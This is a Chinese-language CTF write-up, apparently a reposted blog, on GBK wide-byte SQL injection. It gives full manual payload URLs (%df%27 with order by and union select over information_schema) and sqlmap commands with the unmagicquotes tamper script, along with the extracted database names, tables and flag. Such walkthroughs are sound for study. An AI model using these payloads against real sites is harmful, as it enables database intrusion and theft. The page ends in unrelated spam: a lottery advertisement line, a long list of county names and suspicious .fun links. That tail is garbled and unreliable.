• (宽字节注入) 手注+sqlmap

    进入题目后先简单尝试一下。

    分享图片

     

    很明显的宽字节注入。

    宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码.

    手工注入
    1、判断列数:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23
    order by 3 时报错,说明只有两列。

    2、各类信息:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23
    [email protected] : sae-chinalover : 5.5.52-0ubuntu0.14.04.1

    3、库名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23
    sae-chinalover

    4、表名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,group_concat(table_name)
    from information_schema.tables
    where table_schema=database()%23
    ctf,ctf2,ctf3,ctf4,news

    5、ctf4表的列名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,group_concat(column_name)
    from information_schema.columns
    where table_name=0x63746634%23
    id,flag

    这里注意:要将表名ctf4转为16进制

    这里提供一个字符串转16进制的网站:

    http://www.5ixuexiwang.com/str/hex.php

    转了16进制之后记得在前面加上0x

    6、flag列的数据:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,(select flag from ctf4)%23
    flag{this_is_sqli_flag}

    sqlmap跑法
    1、查看有哪些库:
    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs
    这个时侯就要用到一个脚本了:

    脚本名:unmagicquotes.py

    作用:宽字符绕过

    分享图片

     

     

    2、表名:

    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

    分享图片

     

     

    3、列名:

    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

     分享图片

     

     

    4、flag列的数据:
    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

    分享图片

    相关文章
    相关标签/搜索
    管家婆精选八码中特蓝月亮 沙洋县| 广河县| 大英县| 辽阳县| 彩票| 淅川县| 璧山县| 云龙县| 桦川县| 华蓥市| 兴安盟| 广昌县| 黔西县| 德令哈市| 营山县| 西和县| 镇巴县| 八宿县| 灵璧县| 耿马| 法库县| 横山县| 阆中市| 方山县| 平度市| 芦山县| 陵水| 榆林市| 沿河| 彭州市| 安宁市| 泸西县| 汕头市| 德安县| 大洼县| 德钦县| 纳雍县| 兴山县| 大丰市| 福泉市| 黑河市| 资兴市| 云南省| 阿图什市| 拜城县| 吐鲁番市| 内江市| 若羌县| 朝阳市| 体育| 松溪县| 保康县| 满洲里市| 万安县| 萨嘎县| 即墨市| 射阳县| 文昌市| 连江县| 隆安县| 银川市| 黔东| 安乡县| 宜昌市| 铅山县| 汽车| 长海县| 南郑县| 南康市| 汉阴县| 广平县| 临颍县| 岑巩县| 麻栗坡县| 永寿县| 尼玛县| 千阳县| 梅州市| 繁昌县| 凉山| 民县| 准格尔旗| 左贡县| 兴国县| 桃园市| 漳浦县| 雷波县| 琼中| 屯门区| 彰化市| 宝丰县| 西贡区| 宁晋县| 乳源| 怀远县| 和龙市| 陈巴尔虎旗| 铜山县| 改则县| 临朐县| 科尔| 桦南县| 永福县| 定边县| 土默特右旗| 大新县| 板桥市| 永济市| 开鲁县| 乌拉特后旗| 长泰县| 台安县| 赤城县| 饶阳县| 南雄市| 阿拉善右旗| 康定县| 阳信县| 灵川县| 巫溪县| 简阳市| 毕节市| 榆中县| 五常市| 虎林市| 清河县| 门源| 区。| 漳州市| 克什克腾旗| 特克斯县| 慈溪市| 连州市| 梁平县| 台安县| 资溪县| 威远县| 廉江市| 南木林县| 泾川县| 延川县| 霍林郭勒市| 南开区| 嘉义市| 理塘县| 顺昌县| 搜索| 莆田市| 拉孜县| 根河市| 阜宁县| 泗阳县| 明光市| 洞头县| 桓台县| 许昌市| 盱眙县| 久治县| 绥宁县| 明溪县| 嘉峪关市| 霍林郭勒市| 万山特区| 太保市| 霍林郭勒市| 余庆县| 乡宁县| 内乡县| 余庆县| 惠水县| 江孜县| 张家川| 班戈县| 眉山市| 丰顺县| 娄烦县| 论坛| 抚州市| 紫阳县| 柳河县| 九江县| 定结县| 化德县| 淮北市| 莱阳市| 德州市| 漳浦县| 上虞市| 武川县| 福海县| 岳池县| 全南县| 新巴尔虎左旗| 广灵县| 上蔡县| 会理县| 阿瓦提县| 河曲县| 原阳县| 恩施市| 陆河县| 富源县| 祁阳县| 浦城县| 专栏| 浠水县| 阿城市| 大姚县| 舒兰市| 太康县| 呼伦贝尔市| 弥勒县| 通州区| 固阳县| 原阳县| 五莲县| 上杭县| 胶南市| 南昌县| 启东市| 兴隆县| 沾益县| 连城县| 太谷县| 石屏县| 和林格尔县| 墨脱县| 阜南县| 马公市| 屯留县| 高安市| 仙桃市| 万州区| 金昌市| 沙湾县| 壤塘县| 枣庄市| 柳河县| 禄丰县| 云梦县| 科技| 仪征市| 大埔县| 临西县| 嵊泗县| 郑州市| 黎川县| 大余县| 霞浦县| 瑞安市| 额尔古纳市| 东宁县| 永清县| 岳池县| 兴和县| 金川县| 锡林浩特市| 娱乐| 和林格尔县| 通道| 隆尧县| 青冈县| 含山县| 界首市| 开封县| 宿松县| 太康县| 平乐县| 封开县| 苍南县| 玛纳斯县| 博湖县| 道孚县| 林甸县| 兴文县| 徐水县| 黄山市| 华容县| 保靖县| 新田县| 象州县| 南岸区| 开平市| 山东省| 藁城市| 山阳县| 开阳县| 齐齐哈尔市| 崇礼县| 濮阳县| 凤城市| 新津县| 陇川县| 霍山县| 都匀市| 稻城县| 昌宁县| 新巴尔虎左旗| 分宜县| 克东县| 客服| 梓潼县| 崇仁县| 临猗县| 陇川县| 上杭县| 秀山| 穆棱市| 县级市| 宣城市| 上蔡县| 娄底市| 阳东县| 巴东县| 肥西县| 芦溪县| 珲春市| 苏尼特左旗| 土默特左旗| 青岛市| 游戏| 永修县| 祁连县| 乌兰察布市| 梓潼县| 婺源县| 河源市| 阳泉市| http://3g.bo2020notifys.fun http://3g.bo2020accepts.fun http://3g.yqo9j1rl1v.fun http://3g.yqo2j8rl7v.fun http://3g.bo2020considers.fun http://3g.gz1980subjectc.fun http://3g.gz1980charc.fun http://3g.jvz1j1r4o.fun http://3g.bo2020buttons.fun http://3g.gz1980pinc.fun http://3g.yqo5j4rl3v.fun http://3g.bo2020faces.fun http://3g.gz1980addressc.fun http://3g.bo2020whites.fun http://3g.gz1980snowc.fun http://3g.yqo2j1rl6v.fun http://3g.gz1980setc.fun http://3g.yqo0j0rl1v.fun